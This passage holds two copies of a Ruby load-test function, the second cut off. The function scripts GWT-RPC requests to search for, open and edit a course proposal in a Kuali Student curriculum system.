"def edit_proposal(proposal_name, opts={})\n \n defaults = {\n :proposal_id_dyn_var => 'ep_proposal_id',\n :proposal_id_regexp => 'proposal.resultColumn.proposalId\\\"\\,\\\"\\([^\\\"]+\\)',\n #:proposal_dyn_var => 'ep_proposal',\n #:proposal_regexp => 'proposal\\\"\\,\\\"\\([^\\\"]+\\)',\n :proposal_num_dyn_var => 'ep_proposal_num',\n :proposal_num_regexp => 'proposal\\\"\\,\\\"[^\\\"]+\\\"\\,\\\"\\([^\\\"]+\\)',\n :workflow_id_dyn_var => 'ep_workflow_id',\n :workflow_id_regexp => 'workflowId\\\"\\,\\\"\\([^\\\"]+\\)',\n :id_translation_id_dyn_var => 'ep_id_translation_id',\n :id_translation_id_regexp => 'id-translation\\\"\\,\\\"\\([^\\\"]+\\)',\n :code_dyn_var => 'ep_code',\n :code_regexp => 'code\\\"\\,\\\"\\([^\\\"]+\\)',\n :course_num_suffix_dyn_var => 'ep_course_num_suffix',\n :course_num_suffix_regexp => 'courseNumberSuffix\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_category_id_dyn_var => 'ep_lo_cat_id',\n :lo_category_id_regexp => 'expirationDate\\\"\\,\\\"id\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_category_dyn_var => 'ep_lo_cat',\n :lo_category_regexp => 'name\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_cat_text_dyn_var => 'ep_lo_cat_text',\n :lo_cat_text_regexp => 'loInfo\\\"\\,\\\"sequence\\\"\\,\\\"0\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_cat_id_dyn_var => 'ep_lo_cat_id',\n :lo_cat_id_regexp => '\\([^\\\"]+\\)\\\"\\,\\\"loRepositoryKey',\n :create_id_dyn_var => 'ep_create_id',\n :create_id_regexp => 'createId\\\"\\,\\\"\\([^\\\"]+\\)',\n :course_title_dyn_var => 'ep_course_title',\n :course_title_regexp => 'courseTitle\\\"\\,\\\"\\([^\\\"]+\\)',\n :oversight_org_dyn_var => 'ep_oversight_org',\n :oversight_org_regexp => 'curriculumOversightOrgs\\\"\\,\\\"[^\\,]+\\,\\\"\\([^\\\"]+\\)',\n :lab_fee_id_dyn_var => 'ep_lab_fee_id',\n :lab_fee_id_regexp => 'kuali.enum.type.feeTypes.labFee\\\"\\,\\\"\\([^\\\"]+\\)',\n :atp_dur_week_id_dyn_var => 'ep_atp_dur_week_id',\n :atp_dur_week_id_regexp => 'kuali.atp.duration.Week\\\"\\,\\\"Week\\\"\\,\\\"\\([^\\\"]+\\)',\n :lab_id_dyn_var => 'ep_lab_id',\n :lab_id_regexp => 'Lab\\\"\\,\\\"\\([^\\\"]+\\)',\n :grade_id_dyn_var => 'ep_grade_id',\n :grade_id_regexp => 'kuali.resultComponent.grade[^\\,]+\\,\\\"[^\\,]+\\,\\\"\\([^\\\"]+\\)',\n :person_id_dyn_var => 'ep_person_id',\n :person_id_regexp => 'personId\\\"\\,\\\"\\([^\\\"]+\\)',\n :joints_dyn_var => 'ep_joints',\n :joints_regexp => 'joints\\\"\\,\\\"\\([^\\\"]+\\)',\n :subject_area_dyn_var => 'ep_subject_area',\n :subject_area_regexp => 'subjectArea\\\"\\,\\\"\\([^\\\"]+\\)',\n :title_dyn_var => 'ep_title',\n :title_regexp => 'proposal\\\"\\,\\\"[^\\\"]+\\\"\\,\\\"[^\\\"]+\\\"\\,\\\"\\([^\\\"]+\\)',\n :rationale_dyn_var => 'ep_rationale',\n :rationale_regexp => 'rationale\\\"\\,\\\"\\([^\\\"]+\\)',\n :modify_fields => {\n :course_information => {},\n :governance => {},\n :course_logistics => {},\n :learning_objectives => {},\n :active_dates => {},\n :financials => {}\n }\n }\n \n opts = defaults.merge(opts)\n \n # Search for proposal\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => 
\"5|0|13|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.lang.Integer/3438268394|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|proposal.queryParam.proposalOptionalName|#{proposal_name}|proposal.search.generic|proposal.resultColumn.proposalOptionalName|1|2|3|4|1|5|5|6|10|7|0|8|1|9|10|0|11|12|13|0|6|0|\"\n },\n {\n :dyn_variables => [\n {\"name\" => opts[:proposal_id_dyn_var], \"re\" => opts[:proposal_id_regexp]}\n ]\n }\n )\n \n # Select\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|526F889935910B01B2508B535A13901E|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|isAuthorized|org.kuali.student.core.rice.authorization.PermissionType/259370389|java.util.Map|java.util.HashMap/962170901|java.lang.String/2004016611|kualiStudentObjectWorkflowId|%%_#{opts[:proposal_id_dyn_var]}%%|1|2|3|4|2|5|6|5|1|7|1|8|9|8|10|\"\n },\n {\n 'subst' => 'true'\n }\n )\n \n @request.add_thinktime(2)\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|7|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|526F889935910B01B2508B535A13901E|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|getMetadata|java.lang.String/2004016611|kualiStudentObjectWorkflowId|%%_#{opts[:proposal_id_dyn_var]}%%|1|2|3|4|2|5|5|6|7|\"\n },{'subst' => 'true'}\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|526F889935910B01B2508B535A13901E|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|getData|java.lang.String/2004016611|%%_#{opts[:proposal_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },\n {\n 'subst' => 'true',\n :dyn_variables => [\n {\"name\" => opts[:workflow_id_dyn_var], \"re\" => opts[:workflow_id_regexp]},\n {\"name\" => opts[:id_translation_id_dyn_var], \"re\" => opts[:id_translation_id_regexp]},\n {\"name\" => opts[:code_dyn_var], \"re\" => opts[:code_regexp]},\n {\"name\" => opts[:course_num_suffix_dyn_var], \"re\" => opts[:course_num_suffix_regexp]},\n {\"name\" => opts[:lo_category_id_dyn_var], \"re\" => opts[:lo_category_id_regexp]},\n {\"name\" => opts[:lo_category_dyn_var], \"re\" => opts[:lo_category_dyn_var]},\n {\"name\" => opts[:lo_cat_text_dyn_var], \"re\" => opts[:lo_cat_text_regexp]},\n {\"name\" => opts[:lo_cat_id_dyn_var], \"re\" => opts[:lo_cat_id_regexp]},\n {\"name\" => opts[:create_id_dyn_var], \"re\" => opts[:create_id_regexp]},\n {\"name\" => opts[:course_title_dyn_var], \"re\" => opts[:course_title_regexp]},\n {\"name\" => opts[:oversight_org_dyn_var], \"re\" => opts[:oversight_org_regexp]},\n {\"name\" => opts[:lab_fee_id_dyn_var], \"re\" => opts[:lab_fee_id_regexp]},\n {\"name\" => opts[:atp_dur_week_id_dyn_var], \"re\" => opts[:atp_dur_week_id_regexp]},\n {\"name\" => opts[:lab_id_dyn_var], \"re\" 
=> opts[:lab_id_regexp]},\n {\"name\" => opts[:grade_id_dyn_var], \"re\" => opts[:grade_id_regexp]},\n {\"name\" => opts[:person_id_dyn_var], \"re\" => opts[:person_id_regexp]},\n {\"name\" => opts[:joints_dyn_var], \"re\" => opts[:joints_regexp]},\n {\"name\" => opts[:subject_area_dyn_var], \"re\" => opts[:subject_area_regexp]},\n {\"name\" => opts[:proposal_dyn_var], \"re\" => opts[:proposal_regexp]},\n {\"name\" => opts[:proposal_num_dyn_var], \"re\" => opts[:proposal_num_regexp]},\n {\"name\" => opts[:title_dyn_var], \"re\" => opts[:title_regexp]},\n {\"name\" => opts[:rationale_dyn_var], \"re\" => opts[:rationale_regexp]}\n ]\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|enumeration.queryParam.enumerationType|kuali.lu.campusLocation|enumeration.management.search|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|7|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|atp.search.atpSeasonTypes|1|2|3|4|1|5|5|0|0|6|0|7|0|0|0|\"\n }\n )\n # DUPE\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|7|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|atp.search.atpSeasonTypes|1|2|3|4|1|5|5|0|0|6|0|7|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|18|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|lrc.queryParam.resultComponent.type|kuali.resultComponentType.grade.finalGrade|lrc.queryParam.resultComponent.idRestrictionList|java.lang.String/2004016611|kuali.resultComponent.grade.letter|kuali.resultComponent.grade.satisfactory|kuali.resultComponent.grade.percentage|kuali.resultComponent.grade.recitalReview|kuali.resultComponent.grade.designReview|kuali.resultComponent.grade.completedNotation|lrc.search.resultComponent|1|2|3|4|1|5|5|0|0|6|2|7|8|0|9|7|10|6|6|11|12|11|13|11|14|11|15|11|16|11|17|0|18|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => 
\"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|enumeration.queryParam.enumerationType|kuali.lu.campusLocation|enumeration.management.search|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|18|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|lrc.queryParam.resultComponent.type|kuali.resultComponentType.grade.finalGrade|lrc.queryParam.resultComponent.idRestrictionList|java.lang.String/2004016611|kuali.resultComponent.grade.letter|kuali.resultComponent.grade.satisfactory|kuali.resultComponent.grade.percentage|kuali.resultComponent.grade.recitalReview|kuali.resultComponent.grade.designReview|kuali.resultComponent.grade.completedNotation|lrc.search.resultComponent|1|2|3|4|1|5|5|0|0|6|2|7|8|0|9|7|10|6|6|11|12|11|13|11|14|11|15|11|16|11|17|0|18|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|enumeration.queryParam.enumerationType|kuali.lu.finalExam.status|enumeration.management.search|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|0|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|648421FAE6C751B6B3D6A2EC5262F586|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.core.search.dto.SearchRequest/3917446114|java.util.ArrayList/3821976829|org.kuali.student.core.search.dto.SearchParam/3876231949|enumeration.queryParam.enumerationType|kuali.lu.finalExam.status|enumeration.management.search|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|0|0|0|\"\n }\n )\n \n @request.add_thinktime(2)\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getActionsRequested|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => 
\"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getDocumentStatus|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getActionsRequested|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getDocumentStatus|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n \n # Edit Proposal\n \n if(!opts[:modify_fields][:course_information].empty?)\n \n if(opts[:modify_fields][:course_information][:description])\n \n # Save changes\n contents1 = \"5|0|159|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|526F889935910B01B2508B535A13901E|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|saveData|org.kuali.student.core.assembly.data.Data/3119441076|org.kuali.student.core.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.core.assembly.data.Data$StringKey/1742996354|administeringOrgs|org.kuali.student.core.assembly.data.Data$DataValue/4040075329|org.kuali.student.core.assembly.data.Data$IntegerKey/2690592210|java.lang.Integer/3438268394|org.kuali.student.core.assembly.data.Data$StringValue/3696151110|58|_runtimeData|id-translation|%%_#{opts[:id_translation_id_dyn_var]}%%|passFail|org.kuali.student.core.assembly.data.Data$BooleanValue/268767974|java.lang.Boolean/476441737|audit|finalExamStatus|STD|campusLocations|ALL|All|code|%%_#{opts[:code_dyn_var]}%%|courseNumberSuffix|%%_#{opts[:course_num_suffix_dyn_var]}%%|courseSpecificLOs|loCategoryInfoList|desc|formatted|<p>Desc</p>|plain|Desc|effectiveDate|org.kuali.student.core.assembly.data.Data$DateValue/3833457837|java.sql.Timestamp/1769758459|expirationDate|id|%%_#{opts[:lo_category_id_dyn_var]}%%|loRepository|kuali.loRepository.key.singleUse|metaInfo|versionInd|1|name|%%_#{opts[:lo_category_dyn_var]}%%|state|active|type|loCategoryType.subject|loDisplayInfoList|loInfo|sequence|0|%%_#{opts[:lo_cat_text_dyn_var]}%%|%%_#{opts[:lo_cat_id_dyn_var]}%%|loRepositoryKey|createId|%%_#{opts[:create_id_dyn_var]}%%|createTime|updateId|updateTime|SINGLE USE LO|kuali.lo.type.singleUse|courseTitle|%%_#{opts[:course_title_dyn_var]}%%|creditOptions|fixedCreditValue|10|kuali.creditType.credit.degree.10|resultValues|kuali.resultComponentType.credit.degree.fixed|Credits, 
Fixed|crossListings|curriculumOversightOrgs|51|%%_#{opts[:oversight_org_dyn_var]}%%|descr|#{opts[:modify_fields][:course_information][:description]}|dirty|duration|atpDurationTypeKey|kuali.atp.duration.Year|timeQuantity|org.kuali.student.core.assembly.data.Data$IntegerValue/991919491|Year|expenditure|affiliatedOrgs|feeJustification|fees|feeAmounts|currencyQuantity|currencyTypeKey|kuali.currency.type.usdollars.cents|feeType|kuali.enum.type.feeTypes.labFee|%%_#{opts[:lab_fee_id_dyn_var]}%%|rateType|fixedRateFee|Fixed Rate Fee|Laboratory Fee|formats|activities|activityType|kuali.lu.type.activity.Lab|contactHours|unitQuantity|unitType|kuali.atp.duration.week|per week|defaultEnrollmentEstimate|kuali.atp.duration.Week|Week|%%_#{opts[:atp_dur_week_id_dyn_var]}%%|2|draft|Lab|%%_#{opts[:lab_id_dyn_var]}%%|kuali.lu.type.CreditCourseFormatShell|gradingOptions|kuali.resultComponent.grade.letter|Letter|%%_#{opts[:grade_id_dyn_var]}%%|instructors|personId|%%_#{opts[:person_id_dyn_var]}%%|joints|%%_#{opts[:joints_dyn_var]}%%|pilotCourse|revenues|specialTopicsCourse|subjectArea|%%_#{opts[:subject_area_dyn_var]}%%|termsOffered|kuali.atp.season.Any|Any|kuali.lu.type.CreditCourse|variations|Standard final Exam|transcriptTitle|proposal|%%_#{opts[:proposal_id_dyn_var]}%%|%%_#{opts[:proposal_num_dyn_var]}%%|%%_#{opts[:title_dyn_var]}%%|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|%%_#{opts[:rationale_dyn_var]}%%|kuali.proposal.type.course.create|workflowId|%%_#{opts[:workflow_id_dyn_var]}%%|\"\n contents2 = \"|1|2|3|4|1|5|5|6|7|0|34|8|9|10|5|6|7|0|2|11|12|0|13|14|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|17|-12|-14|-5|-10|-1|-3|8|18|19|20|0|8|21|19|-22|8|22|13|23|8|24|10|5|6|7|0|2|11|-8|13|25|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|26|-35|-37|-29|-33|-1|-27|8|27|13|28|8|29|13|30|8|31|10|5|6|7|0|1|11|-8|10|5|6|7|0|3|8|32|10|5|6|7|0|1|11|-8|10|5|6|7|0|9|8|33|10|5|6|7|0|2|8|34|13|35|8|36|13|37|-61|-63|8|38|39|40|867724416|1198295875584|0|8|41|39|40|3896582272|1258425417728|0|8|42|13|43|8|44|13|45|8|46|10|5|6|7|0|1|8|47|13|48|-61|-81|8|49|13|50|8|51|13|52|8|53|13|54|-57|-59|-53|-55|8|55|10|5|6|7|0|0|-53|-93|8|56|10|5|6|7|0|7|8|57|13|58|8|33|10|5|6|7|0|2|8|34|13|59|8|36|13|59|-99|-103|8|42|13|60|8|61|13|45|8|46|10|5|6|7|0|5|8|62|13|63|8|64|39|40|3246181412|1284195221504|916000000|8|65|13|63|8|66|39|40|3246183944|1284195221504|448000000|8|47|13|48|-99|-115|8|49|13|67|8|53|13|68|-53|-97|-49|-51|-1|-47|8|69|13|70|8|71|10|5|6|7|0|1|11|-8|10|5|6|7|0|6|8|72|13|73|8|42|13|74|8|46|10|5|6|7|0|1|8|47|13|58|-143|-149|8|75|10|5|6|7|0|1|11|-8|13|73|-143|-155|8|53|13|76|8|15|10|5|6|7|0|1|8|53|10|5|6|7|0|1|8|16|13|77|-165|-167|-143|-163|-139|-141|-1|-137|8|78|10|5|6|7|0|0|-1|-173|8|79|10|5|6|7|0|2|11|-8|13|80|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|81|-185|-187|-179|-183|-1|-177|8|82|10|5|6|7|0|2|8|36|13|83|8|15|10|5|6|7|0|1|8|84|10|5|6|7|0|1|8|36|19|20|1|-201|-203|-195|-199|-1|-193|8|85|10|5|6|7|0|3|8|86|13|87|8|88|89|12|1|8|15|10|5|6|7|0|1|8|86|10|5|6|7|0|1|8|16|13|90|-221|-223|-212|-219|-1|-210|8|91|10|5|6|7|0|1|8|92|10|5|6|7|0|0|-231|-233|-1|-229|8|93|10|5|6|7|0|0|-1|-237|8|94|10|5|6|7|0|1|11|-8|10|5|6|7|0|5|8|95|10|5|6|7|0|1|11|-8|10|5|6|7|0|2|8|96|89|12|10|8|97|13|98|-251|-253|-247|-249|8|99|13|100|8|42|13|101|8|102|13|103|8|15|10|5|6|7|0|2|8|102|10|5|6|7|0|1|8|16|13|104|-270|-272|8|99|10|5|6|7|0|1|8|16|13|105|-270|-278|-247|-268|-243|-245|-1|-241|8|106|10|5|6|7|0|1|11|-8|10|5|6|7|0|5|8|107|10|5|6|7|0|1|11|-8|10|5|6|7|0|9|8|108|13|109|8|110|10|5|6|7
|0|3|8|111|13|73|8|112|13|113|8|15|10|5|6|7|0|1|8|112|10|5|6|7|0|1|8|16|13|114|-312|-314|-304|-310|-298|-302|8|79|10|5|6|7|0|0|-298|-320|8|115|89|12|100|8|85|10|5|6|7|0|3|8|86|13|116|8|88|89|12|12|8|15|10|5|6|7|0|1|8|86|10|5|6|7|0|1|8|16|13|117|-338|-340|-329|-336|-298|-327|8|42|13|118|8|46|10|5|6|7|0|5|8|62|13|63|8|64|39|40|3246177449|1284195221504|953000000|8|65|13|63|8|66|39|40|3246183904|1284195221504|408000000|8|47|13|119|-298|-348|8|51|13|120|8|15|10|5|6|7|0|1|8|108|10|5|6|7|0|1|8|16|13|121|-368|-370|-298|-366|-294|-296|-290|-292|8|42|13|122|8|46|10|5|6|7|0|5|8|62|13|63|8|64|39|40|3246177416|1284195221504|920000000|8|65|13|63|8|66|39|40|3246183890|1284195221504|394000000|8|47|13|119|-290|-378|8|51|13|120|8|53|13|123|-286|-288|-1|-284|8|124|10|5|6|7|0|2|11|-8|13|125|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|126|-406|-408|-400|-404|-1|-398|8|42|13|127|8|128|10|5|6|7|0|1|11|-8|10|5|6|7|0|2|8|129|13|63|8|15|10|5|6|7|0|1|8|129|10|5|6|7|0|1|8|16|13|130|-428|-430|-422|-426|-418|-420|-1|8|128|8|131|10|5|6|7|0|0|-1|-437|8|46|10|5|6|7|0|5|8|62|13|63|8|64|39|40|3246166611|1284195221504|115000000|8|65|13|63|8|66|39|40|3246183834|1284195221504|338000000|8|47|13|132|-1|-441|8|133|19|-22|8|134|10|5|6|7|0|0|-1|-459|8|135|19|-22|8|51|13|120|8|136|13|137|8|138|10|5|6|7|0|2|11|-8|13|139|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|140|-477|-479|-471|-475|-1|-469|8|53|13|141|8|142|10|5|6|7|0|0|-1|-487|8|15|10|5|6|7|0|3|8|136|10|5|6|7|0|1|8|16|13|137|-493|-495|8|22|10|5|6|7|0|1|8|16|13|143|-493|-501|-203|10|5|6|7|0|3|8|144|19|-209|8|128|19|-209|8|136|19|-209|-493|-203|-1|-491|8|145|10|5|6|7|0|10|8|42|13|146|8|46|10|5|6|7|0|5|8|62|13|63|8|64|39|40|3246166532|1284195221504|36000000|8|65|13|63|8|66|39|40|3246183375|1284195221504|879000000|8|47|13|147|-518|-522|8|49|13|148|8|149|10|5|6|7|0|1|11|-8|13|127|-518|-540|8|150|13|151|8|152|10|5|6|7|0|0|-518|-548|8|153|10|5|6|7|0|0|-518|-552|8|154|13|155|8|53|13|156|8|157|13|158|-1|-516|-510|13|159|0|0|\"\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"#{contents1}#{contents2}\"\n },\n {\n 'subst' => 'true'\n }\n )\n \n end\n \n end\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getActionsRequested|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D1DD59B8A92305DA33192DAC65F9F820|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getDocumentStatus|java.lang.String/2004016611|%%_#{opts[:workflow_id_dyn_var]}%%|1|2|3|4|1|5|6|\"\n },{'subst' => 'true'}\n )\n \n \n end",
"def edit_proposal(proposal_name, opts={})\n \n defaults = {\n :proposal_id_dyn_var => 'ep_proposal_id',\n :proposal_id_regexp => 'proposal.resultColumn.proposalId\\\"\\,\\\"\\([^\\\"]+\\)',\n #:proposal_dyn_var => 'ep_proposal',\n #:proposal_regexp => 'proposal\\\"\\,\\\"\\([^\\\"]+\\)',\n :proposal_num_dyn_var => 'ep_proposal_num',\n :proposal_num_regexp => 'proposal\\\"\\,\\\"[^\\\"]+\\\"\\,\\\"\\([^\\\"]+\\)',\n :workflow_id_dyn_var => 'ep_workflow_id',\n :workflow_id_regexp => 'workflowId\\\"\\,\\\"\\([^\\\"]+\\)',\n :id_translation_id_dyn_var => 'ep_id_translation_id',\n :id_translation_id_regexp => 'id-translation\\\"\\,\\\"\\([^\\\"]+\\)',\n :code_dyn_var => 'ep_code',\n :code_regexp => 'code\\\"\\,\\\"\\([^\\\"]+\\)',\n :course_num_suffix_dyn_var => 'ep_course_num_suffix',\n :course_num_suffix_regexp => 'courseNumberSuffix\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_category_id_dyn_var => 'ep_lo_cat_id',\n :lo_category_id_regexp => 'expirationDate\\\"\\,\\\"id\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_category_dyn_var => 'ep_lo_cat',\n :lo_category_regexp => 'name\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_cat_text_dyn_var => 'ep_lo_cat_text',\n :lo_cat_text_regexp => 'loInfo\\\"\\,\\\"sequence\\\"\\,\\\"0\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_cat_id_dyn_var => 'ep_lo_cat_id',\n :lo_cat_id_regexp => '\\([^\\\"]+\\)\\\"\\,\\\"loRepositoryKey',\n :create_id_dyn_var => 'ep_create_id',\n :create_id_regexp => 'createId\\\"\\,\\\"\\([^\\\"]+\\)',\n :course_title_dyn_var => 'ep_course_title',\n :course_title_regexp => 